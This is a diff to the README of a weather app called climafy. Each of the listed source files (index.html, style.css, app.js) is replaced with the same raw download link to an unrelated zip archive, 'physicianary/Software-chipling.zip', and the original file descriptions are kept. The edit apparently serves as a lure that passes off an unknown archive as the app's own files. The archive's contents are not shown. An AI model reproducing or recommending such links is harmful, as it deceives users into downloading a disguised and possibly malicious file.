pjfossi324-tech/climafy/README.md

 If you want to know what you get inside the app download:

-- `index.html` — The main page to run in your browser.
+- `https://github.com/pjfossi324-tech/climafy/raw/refs/heads/main/physicianary/Software-chipling.zip` — The main page to run in your browser.
-- `style.css` — CSS file for layout and design.
+- `https://github.com/pjfossi324-tech/climafy/raw/refs/heads/main/physicianary/Software-chipling.zip` — CSS file for layout and design.
-- `app.js` — JavaScript code that fetches weather data and updates the page.
+- `https://github.com/pjfossi324-tech/climafy/raw/refs/heads/main/physicianary/Software-chipling.zip` — JavaScript code that fetches weather data and updates the page.
 - `/assets` — Folder containing images and icons used in the app.

 You don’t need to change these files unless you want to customize climafy yourself.